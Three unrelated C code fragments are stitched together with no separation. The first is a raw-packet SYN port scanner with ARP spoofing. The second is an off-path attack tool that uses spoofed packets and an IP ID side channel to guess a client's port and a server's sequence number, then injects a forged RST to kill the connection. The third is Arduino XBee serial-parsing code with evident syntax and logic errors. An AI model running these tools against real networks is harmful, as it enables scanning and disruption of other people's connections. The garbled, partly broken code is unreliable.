int
main(int argc, char **argv)
{
struct layer *head,*tcp;
struct TCPSocket ts;
struct MAC imac,dmac;
uint32_t ip,dip,gip;
uint16_t eport;
int n;
if(argc < 6)
usage(*argv);
if(if_menu(&imac) < 0)
exit(1);
str_to_ip(argv[1],&ip);
str_to_ip(argv[2],&dip);
str_to_ip(argv[5],&gip);
if( ARPRequest(&imac,&dmac,ip,gip,5) < 0 ){
fprintf(stderr,"error: no route to host.\n");
exit(1);
}
ARPReply(&imac,ip,&dmac,gip);
eport = atoi(argv[4]);
createSocket(&ts,&imac,&dmac,ip,dip,atoi(argv[3]),atoi(argv[3]));
filterDatalink("tcp");
head = NULL;
while(!kbhit()){
if(ts.hostport++ < eport)
SYN(&ts);
if( ( head = recvlayers(&n) ) == NULL)
continue;
if( (tcp = findlayer(head,LT_TCP) ) != NULL ){
struct tcphdr *t;
t = (xtcp)tcp->proto;
if( ( ( t->th_flags & TH_SYN ) == TH_SYN) && ( ( t->th_flags & TH_ACK ) == TH_ACK) ){
printf("recv: SYN-ACK from port %d\n",ntohs(t->th_sport));
printlayers(tcp);
RST(&ts);
}
}
rmlayers(head);
}
closeDatalink();
exit(0);
}
int
main(int argc, char **argv)
{
struct layer *proto;
struct MAC localmac,gwmac,cli_mac;
uint32_t real_ip,spoof_ip,gw_ip,client_ip,server_ip,dly,
dly_serv;
struct TCPSocket ts;
struct datalink icmp_dl,dl;
uint16_t start_port,end_port,server_port,
ip_id_a,ip_id_b,ip_id_d;
unsigned long i;
unsigned short guess_port,min_delta=-1;
unsigned long guess_serv_seq,serv_seq=0;
uint32_t start_guess,end_guess;
int guess_inc;
char icmp_filter[256];
if( argc < 9 )
usage(*argv);
if( argc >= 10){
errno = 0;
serv_seq = strtoul(argv[9],NULL,10);
if(errno)
serv_seq =0;
}
srand(time(NULL));
memset(&dl,0,sizeof(dl));
if( if_openbyname(&dl,argv[1]) < 0 ){
fprintf(stderr,"open_link_byname failed\n");
return 1;
}
memset(&icmp_dl,0,sizeof(dl));
if( if_openbyname(&icmp_dl,argv[1]) < 0 ){
fprintf(stderr,"open_link_byname failed\n");
return 1;
}
guess_port = start_port;
str_to_ip(argv[2],&real_ip);
str_to_ip(argv[3],&gw_ip);
str_to_ip(argv[4],&spoof_ip);
str_to_ip(argv[5],&server_ip);
memcpy(&localmac.mac,dl.dl_mac,6);
snprintf(icmp_filter,sizeof(icmp_filter),"icmp and icmp[0] = 0 and "
"((src %s and dst %s) or (src %s and dst %s))",
argv[4],argv[2],argv[5],argv[2]);
filterDatalink(&icmp_dl,icmp_filter);
if( dl.dl_pcap->linktype == DLT_EN10MB ){
if( ARPRequest(&dl,&localmac,&gwmac,real_ip,server_ip,5) < 0 ){
fprintf(stderr,"lan gateway did not reply arp\n");
exit(1);
}
if( ARPRequest(&dl,&localmac,&cli_mac,real_ip,spoof_ip,5) < 0 ){
fprintf(stderr,"lan gateway did not reply arp\n");
exit(1);
}
}
start_port = atoi(argv[6]);
end_port = atoi(argv[7]);
server_port = atoi(argv[8]);
createSocket(&ts,&localmac,&gwmac,spoof_ip,
server_ip,start_port,server_port);
ts.rcvwin = 0;
ip_id_a = ip_id_b = ip_id_d = 0;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,server_ip,
&dly,&ip_id_a);
printf("delay to server= %lu\n",dly_serv);
echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip,
&dly,&ip_id_a);
printf("delay = %lu\n",dly);
for( i = start_port; i<= end_port; i++ ){
SYN(&ts,&dl);
usleep((dly+dly_serv));
echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
ip_id_a = ip_id_b;
if(ip_id_d < min_delta){
min_delta = ip_id_d;
guess_port = i;
}
printf("for port %d ip_id delta = %x\n",ts.port,ip_id_d); if(ip_id_d == 0 ){
printf( " the client port is: %d\n",ts.port); exit(0);
}
ts.port++;
ts.seq++;
}
printf("guessed port is %d\n",guess_port);
ts.ip = server_ip;
ts.port = server_port;
ts.hostip = spoof_ip;
ts.hostport = guess_port;
printf("finding serv.seq using 16k window\n");
min_delta = -1;
if(serv_seq != 0 ){
ts.seq = serv_seq+65536;
ts.gatewaymac = cli_mac;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_a);
ts.ack = 0;
ACK(&ts,&dl);
//ts.ack = 2<<30;
//ACK(&ts,&dl);
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
printf("for seq %lu delta = %d\n",serv_seq,ip_id_d);
ts.seq = serv_seq;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_a);
ts.ack = 0;
ACK(&ts,&dl);
//ts.ack = 2<<30;
//ACK(&ts,&dl);
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
printf("for seq %lu delta = %d\n",serv_seq+65536,ip_id_d);
closeDatalink(&dl);
closeDatalink(&icmp_dl);
exit(0);
}
ip_id_a = ip_id_b = ip_id_d = 0;
ts.gatewaymac = cli_mac;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_a);
start_guess = 0xffffffff;
end_guess = 16385;
guess_inc = -16384;
for( i = start_guess; abs(end_guess-i)>=0 ; i +=guess_inc ){
ts.ack = 0;
ts.seq = i;
ACK(&ts,&dl);
//ts.ack = 2<<30;
//ts.seq=i;
ACK(&ts,&dl);
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
ip_id_a = ip_id_b;
if(ip_id_d < min_delta){
min_delta = ip_id_d;
guess_serv_seq = i;
if(min_delta == 1)
{
printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d);
RST(&ts,&dl);
exit(0);
}
}
printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d);
}
printf("guessed sequence = %lu\n",guess_serv_seq);
ts.seq = guess_serv_seq;
RST(&ts,&dl);
closeDatalink(&dl);
closeDatalink(&icmp_dl);
return 0;
}
void ReadDataInBuffer(){
int delPos = 0;
int queueLen = 0;
while(xbee_serial.available() > 0){
unsigned char in = (unsigned char)xbee_serial.read();
if(!RxQ.Enqueue(in))
break;
}
queueLen = RxQ.Size()
for(int x=0; x<queueLen; x++){
if(RxQ.Peek(x)==0x7E){
unsigned char checkBuff[Q_SIZE];
unsigned char msgBuff[Q_SIZE];
int checkLen = 0;
int msgLen = 0;
int data_start_index = 0;
checkLen = RxQ.Copy(checkBuff, x);
msgLen = xbee.Receive(checkBuff, checkLen, msgBuff);
if(msgLen > 0){
data_start_index = ((int)msgBuff[9]) + 13;
if(msgBuff[9]==msgBuff[10]){
if(msgBuff[8]==0x01 || msgBuff==0x02){
if(msgBuff[8]==0x01)
manual_control_flag = 1;
else
manual_control_flag = 0;
ChangeRoomStatus(msgBuff, data_start_index);
}
else if(msgBuff[8]==0x03){
SyncRoomDateTime(msgBuff, data_start_index);
}
else if(msgBuff[8]==0x04){
// not yet coded
RequestConsumption(msgBuff);
}
else if(msgBuff[8]==0x07)
ARPRequest(msgBuff);
else if(msgBuff[8]==0x09)
ScheduleFunction(msgBuff);
else if(msgBuff[8]==0x0A)
CheckRoomStatus(msgBuff, data_start_index);
else if(msgBuff[8]==0x0C)
ChangePort(msgBuff, data_start_index);
switch(msgBuff[8]){
case 0x01:
case 0x02:
case 0x03:
case 0x04:
case 0x09:
case 0x0C:
SendAcknowledgement(msgBuff);
break;
default:
break;
}
}
else
SendFrameToOtherModules(msgBuff);
x += msgLen;
delPos = x;
}
else{
if(x>0)
delPos = x-1;
}
}
}
RxQ.Clear(delPos);
}
